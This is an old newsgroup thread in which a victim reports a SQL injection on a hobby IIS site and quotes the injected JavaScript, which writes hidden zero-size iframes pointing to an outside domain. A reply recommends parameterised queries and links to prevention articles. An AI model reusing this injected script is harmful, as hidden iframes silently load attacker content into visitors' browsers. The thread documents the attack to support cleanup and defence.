Re: IIS - SQL Tables Hacked - http://yl18.net/
- From: "Rick Barber" <rick@xxxxxxxxxxx>
- Date: Thu, 8 Nov 2007 13:54:01 -0500
There really is no foolproof way for IIS to protect against everything.
If you truly suffered a SQL injection attack, it could easily have been done
if you are using inline SQL statements in your code, that is, queries built by concatenating user input:
http://www.wwwcoder.com/main/parentid/258/site/2966/68/default.aspx
http://www.4guysfromrolla.com/webtech/061902-1.shtml
Those two articles both give great examples and information on how you can
code your pages to minimize and probably prevent SQL injection attacks
entirely.
--
Rick Barber
http://www.orcsweb.com
Managed Complex Hosting
#1 in Service and Support
<peterjonesp1@xxxxxxxxxxxxxx> wrote in message
news:1194338294.344607.113420@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
My personal IIS and SQL server, which runs my hobby homepages, had a
"leave me a message" set of questions, and someone managed to get my database
tables uploaded with the script quoted below.
This brought my whole system down. I assumed I had full SQL injection
validation and IIS patching. Does anyone know of any new vulnerabilities, or has anyone
suffered the same attack?
Peter.
"function GetCookie (name) {
// Looks up the cookie called `name` in document.cookie and returns its
// unescaped value (via getCookieVal), or null when no match is found.
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) {
var j = i + alen;
// Compare the slice starting at i with "name="; on a match j is the offset
// of the first character of the value.
if (document.cookie.substring(i, j) == arg)
return getCookieVal (j);
// Move to the character after the next space. indexOf returns -1 when no
// space is left, which makes i equal 0 and ends the loop on the next line.
i = document.cookie.indexOf(" ", i) + 1;
if (i == 0) break;
}
return null;
}
function SetCookie (name, value) {
// Writes a cookie `name=value` to document.cookie. Beyond the two declared
// parameters it reads up to four optional positional arguments through
// SetCookie.arguments: expires, path, domain and secure, in that order.
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
// The value is passed through escape(); each attribute is appended only when
// its argument was supplied. `expires` must be a Date, since toGMTString()
// is called on it.
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}
function DeleteCookie (name) {
// Overwrites the cookie `name` with the value 0 and an expiry one millisecond
// before the current time. The only reference to this function in the quoted
// script is a commented-out call inside amt().
var exp = new Date();
exp.setTime (exp.getTime() - 1);
// This cookie is history
var cval = 0;
document.cookie = name + "=" + cval + "; expires=" +
exp.toGMTString();
}
// Global expiry timestamp that amt() passes to SetCookie for the 'count' cookie.
// The multiplier is 8*60*60*1000, so with expDays = 1 the expiry lies eight
// hours after script load, not a full day as the variable name suggests.
var expDays = 1;
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*8*60*60*1000));
function amt(){
// Per-browser view counter kept in a cookie named 'count'. Returns 1 when the
// cookie is absent, otherwise the stored number plus one. The caller at the
// end of the script uses the value 1 to gate sethome(), so that branch runs
// only while the browser holds no 'count' cookie.
var count = GetCookie('count');
//var count;
//alert(count);
//count = null;
if(count == null) {
// No cookie yet: store '1'. No expires argument is passed here, so the cookie
// string is written without an expires attribute.
SetCookie('count','1')
return 1
}
else{
var newcount = parseInt(count) + 1;
// This assigns to `count`, which is not read again in this function, so it
// has no effect on the value stored or returned.
if(newcount<2) count=1;
// Store the incremented counter with the global expiry `exp`.
SetCookie('count',newcount,exp);
//DeleteCookie('count')
return newcount
}
}
function getCookieVal(offset) {
// Returns the unescaped cookie value that starts at `offset` in
// document.cookie and runs up to the next ';', or to the end of the string
// when no ';' follows.
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1)
endstr = document.cookie.length;
return unescape(document.cookie.substring(offset, endstr));
}
function sethome(){
// Writes two <iframe> elements into the page with document.write. Both have
// width="0" and height="0", so they occupy no visible space while the browser
// still requests their src URLs. What those URLs serve is not shown in this
// post.
// NOTE(review): the string literals below are split across lines, presumably
// by mail line-wrapping; as quoted they are not valid JavaScript.
// For cleanup, the host in these src attributes is the string to search for
// in the affected table data.
document.write('<iframe src="http://www.yl18.net/0.html" width="0"
height="0" scrolling="no" frameborder="0"></iframe>');
document.write('<iframe src="http://yl18.net/1.html" width="0"
height="0" scrolling="no" frameborder="0"></iframe>');
}
// Top-level statements of the quoted script. sethome() is called only when
// amt() returns 1, i.e. when the browser had no 'count' cookie.
if(amt()==1)
{
sethome()
}
// This third zero-size iframe is written unconditionally, on every page view,
// whatever the counter value. The trailing double quote closes the quotation
// in the forum post and is not part of the script.
document.write('<iframe src="http://yl18.net/z.html" width="0"
height="0" scrolling="no" frameborder="0"></iframe>');"
.